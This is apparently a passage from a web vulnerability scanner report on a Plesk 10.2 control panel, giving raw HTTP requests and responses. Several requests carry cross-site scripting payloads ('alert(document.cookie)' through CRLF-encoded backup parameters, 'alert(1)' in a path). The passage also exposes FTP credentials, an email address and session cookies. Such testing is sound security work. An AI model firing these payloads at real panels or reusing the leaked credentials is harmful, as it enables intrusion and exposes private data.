QW50aS1WaXJ1cyUyNTJGMS0xJTI1MkZQYXJhbGxlbHMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5wYXJhbGxlbHMuY29tJTI1MkZzdG9yZSUyNTJGcHJlbWl1bWFudGl2aXJ1cyUyNTJGJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEUGFyYWxsZWxzJTJCUHJlbWl1bSUyQkFudGktVmlydXMlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCcmVsZWFzZSUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFBhcmFsbGVscyUyNmRldGFpbHMlMjU1QmlzQXBzJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCcGFja2FnZVVybCUyNTVEJTNEJk9wZXJhdGlvbklEPVBVUkNIQVNFX0FQUExJQ0FUSU9OX0xJQ0VOU0UmYXBwX3ZlbmRvcl9uYW1lPVBhcmFsbGVscyZhcHBfbmFtZT1QYXJhbGxlbHMrUHJlbWl1bStBbnRpLVZpcnVzJmFwcF92ZXJzaW9uPTEmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBhcmFsbGVscy5jb20lMkZzdG9yZSUyRnByZW1pdW1hbnRpdmlydXMlMkYm"); apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.phpbb.com/phpBB/3.0.4-4/parallels.com/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'>phpBB</a></h4>
<div class="package-description">Create a web forum or bulletin board in minutes</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><img src="http://catalog.marketplace.parallels.com/storage/gallery.menalto.com/gallery/2.3.1-4/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'>gallery</a></h4>
<div class="package-description">Quickly organize your photos online</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/trust_wave.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'>Trustwave PCI Validation</a></h4>
<div class="package-description">Utilize Trustwave monthly server scans to keep you PCI compliant</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTAzLTA2JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGVHJ1c3R3YXZlJTI1MjUyMFBDSSUyNTI1MjBWYWxpZGF0aW9uJTI1MkYxLTAlMjUyRlBhcmFsbGVscyUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNmRldGFpbHMlMjU1QmFwcElkJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy50cnVzdHdhdmUuY29tJTI1MkZ2dWxuZXJhYmlsaXR5U2Nhbm5pbmcucGhwJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEVHJ1c3R3YXZlJTJCUENJJTJCVmFsaWRhdGlvbiUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy50cnVzdGtlZXBlci5uZXQlMjUyRmVzcCUyNTJGTG9naW4ucHVibGljJk9wZXJhdGlvbklEPVBVUkNIQVNFX0FQUExJQ0FUSU9OX0xJQ0VOU0UmYXBwX3ZlbmRvcl9uYW1lPVBhcmFsbGVscyZhcHBfbmFtZT1UcnVzdHdhdmUrUENJK1ZhbGlkYXRpb24mYXBwX3ZlcnNpb249MSZhcHBfcmVsZWFzZT0wJmFwcF9ndWlkPWh0dHBzJTNBJTJGJTJGd3d3LnRydXN0d2F2ZS5jb20lMkZ2dWxuZXJhYmlsaXR5U2Nhbm5pbmcucGhwJg=="); apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li></ul></div>

12.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Request

GET /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:11:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:11:16 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Request

POST /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/2
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 862

general%5BgeneralSection%5D%5Bname%5D=fdf080d9224fd0d18957a62c&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=1047527424&general-generalSection-mboxQuotaValue-selector=specific&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc632267%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

12.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:11:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:11:16 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:26:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=3167c639ce1b08f48e3049df3f758ec8; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:26:34 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

12.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view

Request

GET /smb/web/view HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=477d74767594b11beea56c0b8a43890e

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:46 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.15. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
